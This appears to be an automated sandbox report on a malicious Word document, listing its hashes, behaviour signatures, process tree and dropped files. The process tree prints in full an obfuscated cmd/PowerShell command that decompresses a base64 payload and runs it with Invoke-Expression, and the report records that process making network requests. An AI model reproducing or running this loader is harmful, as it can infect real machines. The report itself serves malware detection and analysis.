Analysis

  • max time kernel
    100s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-09-2024 06:38

General

  • Target

    dde043cc7b12431ccd51d84137874332_JaffaCakes118.doc

  • Size

    73KB

  • MD5

    dde043cc7b12431ccd51d84137874332

  • SHA1

    774d2da0c838dc58bc35528bee43bf97b5d7ebad

  • SHA256

    3d03fdbc8ba4b4266c88145f8771d44b9c136171e2c76e86c3e86a080b982724

  • SHA512

    696f4e9b9a5f9df07b6ca011a2c54863cf10e9343712139664d52eb50b81150af3862909d08c1464df66d1a4e61a6572887f871e79ae8c1f8af1d8ac6875963c

  • SSDEEP

    768:YBgPVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9b3vKRmCAzWs8z1RA:vPocn1kp59gxBK85fBt+a9OmCq

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dde043cc7b12431ccd51d84137874332_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\SYSTEM32\CMD.exe
      CMD c:\Windows\SySTEm32\cmd /C "SeT LdEbZ=^& ( $sheLLId[1]+$shelliD[13]+'X') (NEw-oBJEct IO.COmpREsSIoN.deFLaTeSTrEAM([io.MemorYsTrEaM] [CoNVerT]::fROMBASE64STRiNG( 'TZBNa8JAEIb/Sg6BVaybi7bUEEhbK3iwpZZaD71sNhMyurtZNhPjB/53N7ZQLwMz88zDy4Q77RID7bDKNiApeAPi35C9KARDcfis3hNWEtlJFLVtywsEJ3JQSuimRik4UjRapX8EFIVq9hpyFFxWOqplenOrhSwbi9JXB7a+Eg9qvLL235A5UaMCdGhKkYFo6NBxPHPRx7IZvS6e4FYpcqq1cFSDbBz+stFyOkNcHyTjn1Yh9VjK+nFYfK2DJGCP43vmm+MiCcHsJgTaDtgPG3T7AeOwBxYXlQOftRdujiJAE3Rf6J/IHU6h/xafVq1RlchnPuiVuQs6YT+em121heHcS6+TOPOebXyWgmR5Op8v' ) ,[systEM.IO.cOmPRESsion.cOMpressIONMOdE]::DEcomPREss) ^| % { NEw-oBJEct iO.sTReaMReAdER($_,[TEXt.ENCOdIng]::aScIi) } ).reaDToEnD( )&& POwERshELl . (\"{0}{2}{1}\"-f'sE','IteM','T-' ) ( 'vaRIable:9' + 'BUwS' + 'n' ) ( [tYPE]( \"{2}{3}{0}{1}\" -F'RONMe','nT','Env','i')) ; ( ( ^&( 'Ls' ) ( 'vAriAbLe:9' +'BuWS' + 'n' ) ).\"VA`lUe\"::(\"{3}{0}{1}{6}{4}{2}{5}\"-f'iRO','N','riAb','GetenV','a','le','menTV').Invoke( ( \"{1}{0}\" -f'ebZ','ld'),(\"{2}{0}{1}\"-f 'S','s','pRoCe') ) ) ^| ^&( \"{1}{0}{3}{2}\" -f 'nVoKE','I','ESsiOn','-EXpR')"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwERshELl . (\"{0}{2}{1}\"-f'sE','IteM','T-' ) ( 'vaRIable:9' + 'BUwS' + 'n' ) ( [tYPE]( \"{2}{3}{0}{1}\" -F'RONMe','nT','Env','i')) ; ( ( &( 'Ls' ) ( 'vAriAbLe:9' +'BuWS' + 'n' ) ).\"VA`lUe\"::(\"{3}{0}{1}{6}{4}{2}{5}\"-f'iRO','N','riAb','GetenV','a','le','menTV').Invoke( ( \"{1}{0}\" -f'ebZ','ld'),(\"{2}{0}{1}\"-f 'S','s','pRoCe') ) ) | &( \"{1}{0}{3}{2}\" -f 'nVoKE','I','ESsiOn','-EXpR')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4200

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDE83E.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dc4qqv4r.hiy.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

    Filesize

    1KB

    MD5

    a11a6b36e72696bd81b9e11144252fe4

    SHA1

    93cacfec1a6ede32bd2b79eb97c7f4b658102d4e

    SHA256

    567655d15a8ff0cc384d2fa0fc2e2564b6155421087641115228d4437cca7278

    SHA512

    636ccec12e8ebebed8d55c9a59ea012275f75ed2b0e18c85d0df09e130bc874a8ec277b2b1fad9fe881326ae8bdb91a05805b4d400e62d6cb310360d0913f3ee

  • memory/2812-8-0x00007FFE5A790000-0x00007FFE5A7A0000-memory.dmp

    Filesize

    64KB

  • memory/2812-2-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-7-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-17-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-0-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-14-0x00007FFE5A790000-0x00007FFE5A7A0000-memory.dmp

    Filesize

    64KB

  • memory/2812-3-0x00007FFE9CD8D000-0x00007FFE9CD8E000-memory.dmp

    Filesize

    4KB

  • memory/2812-10-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-12-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-15-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-16-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-19-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-23-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-22-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-21-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-20-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-557-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-6-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-9-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-13-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-11-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-43-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-51-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-560-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-4-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-62-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-5-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-71-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-72-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/2812-1-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-556-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-559-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-558-0x00007FFE5CD70000-0x00007FFE5CD80000-memory.dmp

    Filesize

    64KB

  • memory/2812-18-0x00007FFE9CCF0000-0x00007FFE9CEE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4200-57-0x00000231F4200000-0x00000231F4222000-memory.dmp

    Filesize

    136KB